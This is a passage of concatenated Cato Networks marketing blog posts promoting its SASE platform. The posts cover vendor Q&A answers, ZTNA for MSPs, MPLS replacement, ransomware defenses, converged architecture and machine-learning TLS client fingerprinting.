Thanks to our highly scalable cloud-native architectures, the Cato Cloud delivers line-rate performance regardless of whether traffic is encrypted or unencrypted or the number of security operations performed. PoPs have enough spare capacity to accommodate traffic surges. Case in point was how our Manchester PoP accommodated additional traffic during the Interxion outage.
3. For the cloud-native vendors: How can you demonstrate that your homegrown SASE tools stack up against, say, the firewall functionality from a name-brand firewall vendor?
Cato can fully replace branch office firewalls and, usually, datacenter firewalls. Moreover, the convergence of capabilities allows us to deliver security capabilities and visibility impossible with legacy point solutions. For example, we can use data science and machine learning algorithms on networking data to spot security threats before they can exfiltrate data. The company was founded by security luminary Shlomo Kramer, co-founder of Checkpoint Software. It taps some of the brightest minds in cybersecurity that Israel has to offer. You're welcome to try out our platform and see for yourself.
4. Is there a risk that the vendor might be an acquisition target? As the market continues to heat up, further acquisitions seem likely, with the bigger players possibly gobbling up the cloud-native newcomers.
Cato is a well-established company with well over 1,100 enterprise customers committed to serving the needs of those customers for the long term. We've raised over $500 million in venture capital resulting in a private $2.5 billion valuation.
5. For the traditional managed services powerhouses like AT&T and Verizon, do they have all the SASE capabilities, where did they get them, and how well are they integrated? What is the process for troubleshooting, SLAs, and support? Is there a single management dashboard?
Cato just like any cloud service provider enables organizations to co-manage their own Cato implementation while Cato maintains the underlying infrastructure. IT teams can opt to manage infrastructure themselves, outsource a subset of responsibilities to a Cato partner, or have a Cato partner fully manage the infrastructure. There's always 24x7 support available.
6. Is there flexibility in terms of policy enforcement? In other words, can a consistent SASE security policy be applied across the entire global enterprise, and can that policy also be enforced locally depending on business policy and compliance requirements?
Yes, customers apply a consistent security policy across the enterprise. In fact, enterprises have full control over their security policies. We instantiate the most commonly used security policies at startup, so most customers require little or no changes. The policy set is instantly applied across the global enterprise or to a specific site or user depending on requirements. Enterprises can, of course, add/change policies as necessary.
7. Even if enforcement nodes are localized, is there a SASE management control plane that enables centralized administration? This administrative interface should allow security and network policy to be managed from a single console and applied regardless of the location of the user, the application, or the data.
Cato provides centralized administration via our management application. Both security and network policies are managed from the same interface for all Cato-connected users and resources, whether they exist in the office, on the road, at home, or in the cloud.
8. How is sensitive data handled? What are the capabilities in terms of visibility, control and extra protection?
Cato encrypts and protects all data in transit and at rest within the Cato network. Designated applications or data flows that contain sensitive information can also remain encrypted if required in a way that bypasses Cato inspection engines.
9. Is policy enforced consistently across all types of remote access to enterprise resources, whether those resources live in the public internet, in a SaaS application, or in an enterprise app that lives on-premises or in an IaaS setting?
Part of what makes Cato unique is that all inspection engines and network capabilities operate on both northbound traffic to the Internet or east-west traffic to other Cato-connected resources. Our CASB, for example, inspects all Internet and cloud-based traffic. Security capabilities continue to perform well on East-West traffic regardless of the user's location due to the Cato global private backbone and our distributed cloud architecture.
10. Is policy enforced consistently for all possible access scenarios--individual end users accessing resources from a home office or a remote location, groups of users at a branch office, as well as edge devices, both managed and unmanaged?
Cato uses a single policy set for all access scenarios.
11. Is the network able to conduct single-pass inspection of encrypted traffic at line rate? Since the promise of SASE is that it combines multiple security and policy enforcement processes, including special treatment of sensitive data, all of that traffic inspection has to be conducted at line speed in a single pass in order to provide the user experience that customers demand.
Cato uses a single-pass inspection engine that can operate at line rate even on encrypted traffic. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the full set of networking and security capabilities to any user or application, anywhere in the world at cloud scale using a service that is both self-healing and self-maintaining.
12. Is the SASE service scalable, elastic, resilient, and available across multiple PoPs? Be sure to pin the service provider down on contractually enforced SLAs.
The Cato SASE Cloud is a fully distributed, self-healing service, that includes many tiers of redundancies. If the core processing a flow fails, the flow will be handled by one of the other cores in the compute node. Should a compute node fail, other compute nodes in the Cato PoP assume the operation. Should the PoP become inaccessible, Cato has 70+ other PoPs available that enable users to automatically reconnect to the next best available PoP. Enterprises do not need to do any high availability (HA) planning that is typically required when relying on virtual appliances to deliver SASE services.
We have 99.999% uptime SLAs with our carriers. Should one of the tier-1 carriers connecting our PoPs experience an outage or slowdown, Cato's routing software detects the change and automatically selects the next best path from one of two other carriers connecting our PoPs. Should the entire Cato backbone -- that's right all 70+ PoPs somehow disappear, one day -- Cato Sockets will automatically bring up a peer-to-peer network.
13. One of the key concepts of zero trust is that end-user behavior should be monitored throughout the session and actions taken to limit or deny access if the end user engages in behavior that violates policy. Can the SASE enforce those types of actions in real time?
Cato inspects device posture first upon connecting to the network, ensuring the device meets predefined policy requirements and then continues to monitor the device once connected.
Should a key variable change, such as an anti-malware engine expire, the device can be blocked from the network or provided limited access depending on corporate requirements. As users connect to cloud application resources, Cato inspects traffic flows. Dozens of actions within applications can be blocked, enabled, or otherwise monitored and reported, such as uploading files or giving write access to key applications.
14. Will the SASE deliver a transparent and simplified end user experience that is the same regardless of location, device, OS, browser, etc.?
The Cato experience remains consistent regardless of operating system. Mobile users can be given clientless access or client-based access with the Cato Mobile Client. The Cato Mobile Client is available for all major enterprise platforms including Windows, macOS, Android (also supported for ChromeOS), iOS, and Linux. Users within the locations connected by Cato Sockets, Cato's edge SD-WAN device, log into their network as usual with no change.
Once connected to the Cato SASE Cloud, all security inspection is done locally at the connected PoP, eliminating the traffic backhaul that so often degrades the performance of mobile users situated far from their offices. The Cato Global Private Backbone uses optimized routing to minimize latency and WAN optimization to maximize throughput. The result is a remote user experience that's as close as possible to being inside the office.
Other Questions to Explore
We applaud Network World for raising these issues. Some other questions we might encourage IT teams to ask MSPs include:
High Availability (HA): Take a close look at how HA is delivered by the vendor. What's the additional cost involved with deploying the secondary appliance? How are the SD-WAN devices configured and deployed? With most enteprises, HA has become the defacto edge configuration to ensure the high uptime they're looking for particularly when replacing MPLS.
What happens when there is a lockup rather than just an outage, will the system failover properly?
What about the underlying memory, storage, and server system underpinning what are often virtual appliances?
What happens if the PoP itself becomes inaccessible?
The list goes on. The secure Cato SASE platform is based on a fully distributed self-healing network built for the cloud era that we manage 24/7 on behalf of our customers. Anything less than that from our perspective simply isn't SASE.
The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and...
Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires.
However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are not designed for the modern, distributed enterprise. Upgrading to zero trust network access (ZTNA) provides numerous benefits to these organizations.
Main Benefits of ZTNA for MSPs
For Managed Service Providers (MSPs) offering remote access services, making the move to ZTNA can significantly help their customers. However, it is not just the customer who benefits. An MSP that makes ZTNA part of its service offering can reap significant benefits, especially if it is deployed as part of a Secure Access Service Edge (SASE) offering. Let’s take a closer look at some of the key benefits:
Tighter Security Controls
VPNs are designed solely to provide a secure network link between two points. VPNs have no built-in traffic inspection capabilities and provide users with unrestricted access to corporate resources.
By using VPNs for secure remote access, organizations expose themselves to various cyber threats. Cyber threat actors commonly target VPNs with credential stuffing attacks, hoping to take advantage of compromised credentials to gain full access to the enterprise network. VPNs are also prone to vulnerabilities that attackers can exploit to bypass access controls or eavesdrop on network traffic.
ZTNA provides the same remote access capabilities as VPNs but does so on a case-by-case basis that allows effective implementation of least privilege access controls. By deploying ZTNA to customer environments, MSPs can reduce the occurrence and impact of security incidents. This results in an improved customer experience and reduced costs of recovery.
[boxlink link="https://www.catonetworks.com/resources/poor-vpn-scalability-hurts-productivity-and-security/?utm_source=blog&utm_medium=top_cta&utm_campaign=poor_vpn_scalability"] Poor VPN Scalability Hurts Productivity and Security | EBOOK [/boxlink]
Improved Visibility and Control
VPNs provide unrestricted access to the corporate network, providing a user experience similar to working from the office. Since VPNs don’t care about the eventual destination of network traffic, they don’t collect this information. This provides an organization or their MSP with limited visibility into how a VPN is being used.
ZTNA provides access to corporate resources on a case-by-case basis. These access decisions are made based on the account requesting the access, the resource requested, and the level of access requested. Based on this data and an organization’s access controls, access is permitted or denied.
ZTNA performs more in-depth traffic inspection and access management as part of its job, and these audit logs can provide invaluable visibility to an MSP. With the ability to see which accounts are remotely accessing various resources, an MSP can more easily investigate potential security incidents, identify configuration errors and other issues, and strategically allocate resources based on actual usage of IT infrastructure and assets.
Improved Customer Satisfaction
During the pandemic, the performance and scalability limitations were laid bare for all to see. Many organizations needed to rapidly shift from mostly on-site to remote work within a matter of weeks. To do so, they often deployed or expanded VPN infrastructure to support a workforce much larger than existing solutions were designed to handle.
However, VPNs scale poorly and can create significant performance issues. Remote access deployments built on VPNs overwhelmed existing network infrastructure, created significant latency, and offered poor support for the mobile devices that remote workers are increasingly using to do their jobs. During the pandemic, employees experienced significant network latency as traffic to cloud-based applications and data storage was backhauled through on-prem data centers by VPN appliances. As a result, employees commonly sought workarounds - such as downloading sensitive data to devices for easier access or using unapproved services - in order to do their jobs.
ZTNA solutions provide optimized performance and better security by moving away from the perimeter-focused security model of VPNs. As corporate infrastructure and resources move to the cloud, employees need high-performance access to SaaS solutions, and routing traffic to these solutions via the corporate network makes no sense. ZTNA makes it possible to perform access management in the cloud and improve the user experience.
For MSPs, improving the end user experience also improves the experience of their customers, who need to listen to employees’ complaints about performance and latency issues. Additionally, ZTNA enables an MSP to eliminate inefficient routing, which creates unnecessary load on their infrastructure and can make it more difficult to meet customer expectations for network performance.
Value-Added Functionality
VPNs provide bare-bones network connectivity for remote users. If an organization wants additional access control or to secure the traffic flowing over the VPN connection, this requires additional standalone solutions.
By making the move from VPNs to ZTNA for secure remote access, an MSP can expand the services offered to their customers with minimal additional overhead. ZTNA offers access management, and so can an MSP. The data generated by ZTNA can be processed and displayed on dashboards for customers looking for additional insight into their network usage or security. MSPs can provide ongoing support services for the management and maintenance of ZTNA solutions.
SASE Supercharges ZTNA
Making the move to ZTNA for their secure remote access offerings makes logical sense for MSPs. ZTNA provides more functionality, better performance and security, and simpler management and maintenance than VPN-based infrastructure.
However, the benefits of ZTNA can be dramatically expanded by deploying it as part of a SASE solution. SASE is deployed as a network of cloud-based points of presence (PoPs) with dedicated, high-performance network links between them. Each SASE PoP integrates ZTNA with other security and network optimization features, providing high-performance and reliable connectivity and enterprise-grade security for the corporate WAN.
Making the move to ZTNA streamlines and optimizes an MSP’s remote access services offering. Deploying it with SASE does the same for an MSP’s entire network and security services portfolio.
Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs...
IT Managers: Read This Before Leaving Your MPLS Provider Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO.
“That MPLS – too expensive. Find an alternative.”
This couldn’t have come at a better time...
Employees have been blowing up the helpdesk, complaining about slow internet, laggy Zoom calls and demos that disconnect with prospects. Naturally, it’s your job to find a solution...
There actually could be several reasons why it’s time to pull the plug on your MPLS, or at least, consider MPLS alternatives.
1. Get crystal clear on your WAN challenges:
Do any of these challenges sound familiar?
A. You’ve been told to cut costs
It’s no secret that MPLS circuits cost a fortune – often 3-4x the price of MPLS alternatives (like SD-WAN,) for only a fraction of the bandwidth. But the bottom line isn’t the only factor to take into consideration. Lengthy lead-times for site installations (weeks to months,) upgrades, and never-ending rounds of support tickets must all factor into the TCO of your MPLS. In short, MPLS is no longer competitively priced for today’s enterprise that needs to move at the speed of business.
B. Employees constantly complain about performance
While traditional hub-and-spoke networking topology comes with its advantages, when users backhaul to the data center they clog the network with bandwidth-heavy applications like VOIP and file transfer. Multiplied by hundreds or thousands of simultaneous users and you choke your network, creating performance problems which IT is tasked to solve. Wouldn’t it be nice if IT was free to solve business-critical issues instead of recurring network performance issues?
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | EBOOK [/boxlink]
C. You’re “going cloud” and migrating from on-prem to cloud DCs and apps
Migrating from on-prem legacy applications to cloud isn’t generally an “if” but a “when” statement. And the traditional hub-and-spoke networking architecture creates too much latency on cloud applications when the goal is ultimately improved network performance. Additionally, optimizing and securing branch-to-cloud and user-to-cloud access can’t be done efficiently with physical infrastructure, instead of requiring advanced cloud-delivered cybersecurity solutions like SWG, FWaaS and CASB.
D. IT now needs to support work from anywhere, with no downtime
Prior to COVID, work from anywhere was more the exception, rather than a rule. In the “new normal,” enterprises need to the infrastructure to support work from the branch, home, and everywhere else. Traditional remote-access VPNs weren’t designed to support hundreds, or thousands of users simultaneously connecting to the network, while supporting an optimum security posture, like ZTNA can.
So, should you stay with MPLS or should you go?
Ultimately, it’s time to decide whether to stick with your incumbent MPLS provider or consider the alternatives to MPLS...
Whether it’s cost, digitization, performance or secure remote access - is your MPLS “good enough” to support today’s hassles and headaches (not to mention tomorrows?)
2. You’ve decided to look for MPLS alternatives: Do all roads lead to SD-WAN?
You’ve decided that your MPLS isn’t all it's cracked up to be. Now what?
While an SD-WAN solution seems like the natural choice, SD-WAN only addresses some of the challenges that you’ll inevitably face at a growing enterprise.
True, SD-WAN will lower the bill and optimize spend by leveraging internet circuits’ massive capacity and availability everywhere.
However, SD-WAN was designed to optimize performance for site-to-site connectivity, with architecture that isn’t designed to support remote users and clouds.
Additionally, SD-WAN's security is basic at best, lacking the advanced control and prevention capabilities that enterprises need to secure all clouds, datacenters, branches, users and, appliances.
Not to mention, adding SD-WAN to existing appliance sprawl is only going to further complicate your network management, adding more products to administrate, and more hassle surrounding appliance sizing, scaling, distribution, patching and upkeep.
And who needs that headache?
So, how do you solve all the above four challenges, while upgrading your networks and achieving an optimal security posture that allows your enterprise to grow, scale, adjust and stay prepared for “whatever’s next”?
3. Ever Heard of SASE?
No, SASE isn’t just a buzzword or industry hype. It’s the next era of networking and security architecture which doesn’t focus on adding more features to the complicated pile of point solutions, but targets “operational simplicity, automation, reliability and flexible business models,” (Gartner, Strategic roadmap for networking, 2019.)
According to Gartner, for a solution to be SASE, it must “converge a number of disparate network and network security services including SD-WAN, secure web gateway, CASB, SDP, DNS protection and FWaaS,” (Gartner, Hype Cycle for Enterprise Networking 2019.) Gartner is extremely clear that these requirements aren’t just “nice-to-have,” but non-negotiables; the solution must be converged, cloud-native, global, support all edges, and offer unified management.
SASE actually combines SD-WAN and security-as-a-service, managed via a single cloud service, which is globally distributed, automatically scaled, and always updated.
So, instead of opting for more network complexity with SD-WAN, plus all the setup, management, sizing, and scaling challenges that come with it – why not consider SASE?
It’s time to think strategically: Move beyond the limitations of SD-WAN
No matter if you need to solve one, two, three or all four of the above WAN challenges, SD-WAN is a short-sighted point solution to any long-term organizational challenge.
This means that only a SASE solution with an integrated SD-WAN which includes a global-private backbone (over costly long-haul MPLS,) ZTNA (to serve remote access users and replace legacy VPN) and secure cloud access (which allows you to migrate to the cloud,) allows you to successfully grow the business while maintaining your sanity.
If you’re interested in replacing your MPLS beyond the limits of short-sighted solutions like SD-WAN, then you’ll love Cato SASE Cloud.
Check out this Cato SASE E-book to understand:
Why point products like SD-WAN won’t solve long-term architectural problems
What you need to look for in a SASE solution
Why Cato is the only true SASE solution in enterprise networking and security
With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in...
How to Protect from Ransomware with SASE With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of impact of ransomware on organizations, and how Cato SASE Cloud can help prevent ransomware and protect businesses.
This blog post is based on the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
4 Ways Ransomware Affects Organizations
1. Immediate Loss of Productivity
Organizations depend almost entirely on data and applications for their daily operations, including making payments, creating products and delivering and shipping them. If this comes to a halt, the loss of productivity is enormous. For some global enterprises, this could even mean losing millions of dollars per hour. Recovering backups and attempting data recovery could take IT teams weeks of work. To restore productivity, some businesses prefer to pay the ransom and get operations back on track.
2. Data Encryption
According to Cybercrime Magazine, the global cost of ransomware damages will exceed $20 billion in 2021 and $265 Billion by 2031. One of the ways attackers gain these amounts is encrypting organizational data, and requiring a payment for instructions on how to decrypt it. To motivate victims to pay, attackers might threaten to destroy the private key after a certain amount of time, or increase the price as time passes.
To view the entire list and additional ways ransomware impacts organizations, check out the ebook.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help/?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | eBook [/boxlink]
How Cato SASE Cloud Prevents Ransomware
By converging network and security into a global, cloud-native service, Cato’s SASE platform provides visibility into traffic, edges and resources, which enables building a comprehensive and unique security solution that protects from malware while eliminating false positives.
Here’s are six ways Cato SASE Cloud protected organizations from ransomware:
1. Reputation Data & Threat Intelligence
Cato leverages threat intelligence feeds from open-source, shared communities and commercial providers. In addition, after finding that 30% of feeds contain false positives or miss IoCs, Cato built a complementing system that uses ML and AI to aggregate records and score them.
2. Blocking Command and Control Communication
Cato IPS prevents delivery of ransomware to machines, which is the primary way perpetrators gain hold of systems prior to the attack. If an attacker is already inside the network, Cato prevents the communication that attackers use to encrypt files and data.
3. Blocking Suspicious SMB File Activity
Cato IPS detects and blocks irregular network activity, which could be the result of attackers using SMB to rename or change extensions of encrypted files.
4. Zero Trust Network Access
Cato SASE Cloud provides a zero-trust approach to ensure users and hosts can only access applications and resources they are authorized for. This reduces the attack surface, limiting ransomware's ability to spread, encrypt and exfiltrate data.
5. Stopping Known and Zero-Day Threats
Leveraging machine learning, Cato’s advanced anti-malware solution defends against unknown threats and zero-day attacks, and is particularly useful against polymorphic malware designed to evade signature-based inspection engines.
6. An IPS that Sees the Full Picture, Not a Partial One
Cato’s IPS has unique capabilities across multiple security layers, including: layer-7 application awareness, user identity awareness, user/agent client fingerprint, true file type, target domain/IP reputation, traffic attributes, behavioral signature and heuristic, and more.
Scale Your Security Team with Cato MDR
Cato can offload the resource-intensive process of detecting compromised endpoints from organizations’ already-busy IT and security teams. This eliminates the need for additional installations as Cato already serves as the customer’s SASE platform, supplying unparalleled visibility into all traffic from all devices.
Capabilities provided:
Automated Threat Hunting
Human Verification
Network-Level Threat Containment
Guided Remediation
Reporting & Tracking
Assessment Check-Ups
Cato MDR service can help you identify and contain ransomware and suspicious activities before they activate and impact your business. Through lateral movement detection and baselining host behavior, Cato MDR service gives your network an extra set of eyes to detect, isolate and remediate threats. Contact us to learn more.
See the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
The Secure Access Service Edge (SASE) is a unique innovation. It doesn’t focus on new cutting-edge features such as addressing emerging threats or improving application...
Lipstick on a Pig: When a Single-Pane-of-Glass Hides a Bad SASE Architecture The Secure Access Service Edge (SASE) is a unique innovation. It doesn’t focus on new cutting-edge features such as addressing emerging threats or improving application performance. Rather, it focuses on making networking and security infrastructure easier to deploy, maintain, manage, and adapt to changing business and technical requirements. This new paradigm is threatening legacy point solution incumbents. It portrays the world they created for their customers as costly and complex, pressuring customer budgets, skills, and people.
Gartner tackled this market trend in their research note: “Predicts 2022: Consolidated Security Platforms are the Future.” Writes Gartner, “The requirement to address changing needs and new attacks prompts SRM (security and risk management) leaders to introduce new tools, leaving enterprises with a complex, fragmented environment with many stand-alone products and high operational costs.” In fact, customers want to break the trend of increasing operational complexity. Writes Gartner. “SRM leaders tell Gartner that they want to increase their efficiency by consolidating point products into broader, integrated security platforms that operate as a service”.
This is the fundamental promise of SASE. However, SASE is extremely difficult for vendors that start from a pile of point solutions built for on-premises deployment. What such vendors need to do is re-architect these point solutions into a single, converged platform delivered as a cloud service. What they can afford to do is to hide the pile behind a single pane of glass. Writes Gartner: “Simply consolidating existing approaches cannot address the challenges at hand. Convergence of security systems must produce efficiencies that are greater than the sum of their individual components."
[boxlink link="https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider"] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
How can you achieve efficiency that is greater than the sum of the SASE parts? The answer is: core capabilities should be built once and be leveraged to address multiple functional requirements.
For example, traffic processing. Traffic processing engines are at the core of many networking and security products including routers, SD-WAN devices, next generation firewalls, secure web gateways, IPS, CASB/DLP, and ZTNA products. Each such engine uses a separate rule engine, policies, and context attributes to achieve its desired outcomes. Their deployment varies based on the subset of traffic they need to inspect and the source of that traffic including endpoints, locations, networks, and applications.
A true SASE architecture is “single pass.” It means that the same traffic processing engine can address multiple technical and business requirements (threat prevention, data protection, network acceleration). To do that, it must be able to extract the relevant context needed to enforce the applicable policies across all these domains. It needs a rule engine that is expandable to create rich rulesets that use context attributes to express elaborate business policies. And it needs to feed a common repository of analytics and events that is accessible via a single management console.
Simply put, the underlying architecture drives the benefits of SASE bottom-up -- not a pretty UI managing a convoluted architecture top-down. If you have an aggregation of separate point products everything becomes more complex -- deployment, maintenance, integration, resiliency, and scaling -- because each product brings its unique set of requirements, processes, and skills to an already very busy IT organization.
This is why Cato is the world’s first and most mature SASE platform. It isn’t just because we cover the key functional requirements of SD-WAN, Secure Web Gateway (SWG), Firewall-as-a-Service (FWaaS), Cloud Access Security Broker (CASB), and Zero Trust Network Access (ZTNA). Rather, it is because we built the only true SASE architecture to deliver these capabilities as a single global cloud service with simplicity, automation, scalability, and resiliency that truly enables IT to support the business with whatever comes next.
A Complex Landscape As time passes, technology and human innovation have advanced rapidly. This is not only in terms of available connectivity, bandwidth, and processing...
The Value of Security Simplicity A Complex Landscape
As time passes, technology and human innovation have advanced rapidly. This is not only in terms of available connectivity, bandwidth, and processing power but also in terms of the networking and security landscape as well. For every technological advancement in consumer and business productivity, IT systems, operations and security must also try and keep pace.
We must consider not only the speed and capacity at which these tools must operate, but also the emergence of entirely new technical domains. The industry has moved away from castle and moat designs and replaced them with cloud platforms for a variety of services, effectively moving from endpoint security to network security and finally to cloud security and cloud-delivered network security. But with each new need and technical area, a multitude of vendors and products emerge only adding to the complexity.
[caption id="attachment_24677" align="alignnone" width="3000"] Momentum CyberScape Source[/caption]
IT and security leaders must consider multiple security product categories such as network & infrastructure, web, endpoint, application, data, mobile, risk & compliance, operations & incident response, threat intelligence, IoT, IAM, email/messaging, risk management, and more. Adding to the challenge, for each category there are multiple vendors with different product sets, architectures and capabilities. It can be time consuming and challenging to prioritize security investments while selecting the ideal vendor for your business. While each product that you purchase and implement is intended to strengthen your security posture and reduce risk, these products may also be increasing the complexity of your environment.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | Get the eBook [/boxlink]
Complexity Erodes Security
Many have considered it a best practice to purchase products based on the perception in the market as “best of breed.” This approach seems logical but can be detrimental as getting these products to work together can be difficult or impossible. Even products from the same vendor can be lacking in integration, especially if the product was the result of an acquisition. Furthermore, even with out-of-the-box integrations, getting everything to work as desired can still be very time-consuming.
You may have already learned through experience that integration is not convergence. If you are still questioning the difference between the two, here are two examples. A converged solution will have a single management application for all functions of the platform. Separate consoles or a pseudo-unified console that requires downloading, installing, and managing plugins are not converged. For cloud-delivered offerings, a converged solution will offer all capabilities at all PoPs. A vendor that uses some PoPs for capabilities like DLP and remote access and other PoPs for things like NGFW and SWG is not converged. Non-converged solutions can drastically increase management touch, increasing administrative overhead and cost while eroding security value.
How does this happen? For every new product and management application, the opportunity for misconfiguration increases as does the number of policies. Misconfigurations can easily lead to high profile security incidents, while multiple sets of separate policies can lead to gaps that are difficult to identify. A converged security platform provides holistic visibility into your organization’s policies and even makes it easier when you need to conduct compliance audits. Of course, the market has responded to this, and you can spend more money on third-party integration and management tools, or developers that can build custom integrations for you. However, CISO’s live in the real world and do not have unlimited budget, nor do they typically want to own a software development life cycle for home-built integrations. Just remember, more vendors and more products can easily mean more problems.
Is Your Security Stack Weighing You Down?
In addition to hurting your organization’s budget and security posture, point-security products also reduce your ability to be agile and innovate. You may need to manage an update schedule for each of your devices and products. While most vendors have automatic update options, the best practice is to test updates before putting them into production and monitor impacts after production. For example, a content update on a Palo Alto Networks PA-220 Firewall is estimated to take up to 10 minutes.* If you have 1,000 PA-220s, that is more than 166 hours of update time, not including downloading, testing, and verifying. Updates to the device’s firmware or operating system will likely take longer and can lead to outages or device failures. All this time spent on maintaining what you already own can slow other projects in your organization.
“[Content update] installation can take up to 10 minutes on a PA-220 firewall” * Source
Beyond your organization’s ability to innovate, you should also consider the impacts on yourself or your team. Most security products require specialized technical expertise. This can make hiring challenging, especially if you need someone who can manage multiple aspects of your deployment. This means that hiring cycles will take longer, work/life balance may be compromised, and new hire ramping time is increased. Furthermore, complex deployments can make it difficult for skilled individuals to be promoted or take vacation time.
Your security stack represents a significant investment, but is it serving all users, locations, and applications? The costs of deploying and managing your own security architecture will often lead to compromises. You may have a few datacenters and probably backhaul traffic to them to secure. But often enough due to performance and other requirements, you may also be excluding specific locations, users, or applications from some or all security functions. This creates inconsistency in your security posture and user experience and will hurt your organization.
SASE Is the Way
You probably have heard of the Secure Access Service Edge or SASE, a term that Gartner coined in 2019. SASE is the way forward for most modern organizations and represents the convergence of networking and security capabilities delivered from the cloud. This allows organizations to remain agile and flexible, reducing complexity, while securing and enabling their users. The SASE market is relatively new, but there are already multiple vendors who want your business.
When looking at SASE, don’t forget about simplicity, many vendors don’t have converged solutions and the complexity of legacy technology still lurks in their products. Management time and policy sets should be reduced, while deployments and new feature adoption should be seamless. Updates are the vendor's responsibility, keeping you more secure and giving you time for other projects. You may have heard the acronym K.I.S.S. before, but I’ve changed it a bit for a SASE world: Keep It Simple & Secure.
“When we learned about the Cato solution, we liked the idea of simple and centralized management. We wouldn’t have to worry about the time-consuming process of patch management of on-premise firewalls,” – Alf Dela Cruz, Head of IT Infrastructure and Cyber Security at Standard Insurance
Identification of OS-level client types over IP networks has become crucial for network security vendors. With this information, security administrators can gain greater visibility into...
Inside Cato: How a Data Driven Approach Improves Client Identification in Enterprise Networks Identification of OS-level client types over IP networks has become crucial for network security vendors. With this information, security administrators can gain greater visibility into their networks, differentiate between legitimate human activity and suspicious bot activity, and identify potentially unwanted software. The process of identifying clients by their network traces is, however, very challenging. Most of the common methods being applied today require a great deal of manual work, advanced domain expertise, and are prone to misclassification. Using a data-driven approach based on machine learning, Cato recently developed a new technology that addresses these problems, enabling accurate and scalable identification of network clients.
Going “old school” with manual fingerprinting
One of the most common methods to passively identify network clients, without requiring access to either endpoint, is fingerprinting. Imagine you are a police investigator arriving at a crime scene for forensics. Lucky for you, the suspect left an intact fingerprint. Since he is a well-known criminal with previous offenses, his fingerprints are already in the police database, and you can use the one you found to trace back to him. Like humans, network clients also leave unique traces that can be used to identify them. In your network, combinations of attributes such as HTTP headers order, user-agents, and TLS cipher suites, are unique to certain clients.
[boxlink link="https://catonetworks.easywebinar.live/registration-ransomware-chokepoints"] Ransomware Chokepoints: Disrupt the Attack | Watch Webinar [/boxlink]
In recent years, fingerprints relying solely on unsecured network traffic attributes (e.g., the HTTP user-agent value) have become obsolete, since they are easy to spoof, and are not applicable when using secured connections. TLS fingerprints, that rely on attributes from the Client Hello message of the TLS handshake, on the other hand, do not suffer from these drawbacks and are slowly gaining larger adaptation from security vendors.
Below is an example of a TLS fingerprint that identifies a OneDrive client.
Caption: TLS header fingerprint of a One Drive client (source)
However, manually mapping network clients to unique identifiers is not a simple task; It requires in-depth domain knowledge and expertise. Without them, the method is prone to misclassifications. In a shared community effort to address this issue, some open-source projects (e.g. sslhaf and JA3) were created, but they provide low coverage and are not updated frequently.
An even greater issue with manual fingerprinting is scalability. Accurately classifying client types requires manually analyzing traffic captures, a labor-intensive process that does not scale for enterprise networks.
Taking such an approach at Cato wasn’t feasible. Each day the Cato SASE Cloud must inspect millions of unique TLS handshake values. The large number of values is due not only to the number of network clients connected to Cato SASE Cloud but also to the number of different versioning and updates that alter the TLS behavior of each client. Clearly, we needed a better solution.
Clustering – An automated and robust approach
With great amounts of data, comes great amounts of capabilities. With the use of machine learning clustering algorithms, we’ve managed to reduce millions of unique TLS handshake values to a subset of a few hundred clusters, representing unique network clients that share similar values. After creating the clusters, a single fingerprint can be generated for each one, using the longest common substring (LCS) from the Client Hello message of all the samples in the cluster. Finding the common denominator of several samples makes the approach more robust to small variations in the message values.
Caption: Similar values from the TLS Client Hello message are clustered together and the LCS is used to generate a fingerprint. Each colored cluster represents a different client.
The next step of the process is to identify and label the client of the fingerprint. To do so, we search for the fingerprint in our data lake, containing terabytes of daily network flows generated from different clients, and look for common attributes such as domains or applications contacted, and HTTP user-agent (visible from TLS traffic interception and inspection).
For example, in the plot above, a group of TLS network flows, containing similar Client Hello messages, were clustered together by the algorithm (see the 3-point “Java/1.8.0_211” cluster colored in light blue). The resulting TLS fingerprint matched a group of inspected TLS flows in our data lake, with visible HTTP headers; all of which had a common user-agent that belongs to the Java Standard Library; a library used to perform HTTP requests.
Wrapping up
Accurately identifying client types has become crucial for network security vendors. With this new data-driven approach, we’ve managed to develop a fully automated and continuous pipeline that generates TLS fingerprints. The new method scales to large enterprise networks and is more robust to variation in the client's network activity.
Why Yes The global economy’s shift to hybrid work models is challenging enterprises to securely connect their work-from-anywhere employees. Supporting these highly distributed, dynamic, and...
Can You Really Trust Zero Trust Network Access? Why Yes
The global economy's shift to hybrid work models is challenging enterprises to securely connect their work-from-anywhere employees. Supporting these highly distributed, dynamic, and diverse networks requires enterprises to be more flexible and accommodating, which results in remote access becoming an increasingly expanding attack surface. A crucial step in reducing this risk is transitioning from legacy VPNs, with their inherently risky castle-and-moat approach, to Zero Trust Network Access (ZTNA). The latter implements a much more restrictive access control mechanism, which allows users to connect to applications on a need-to-access only basis.
Why Not
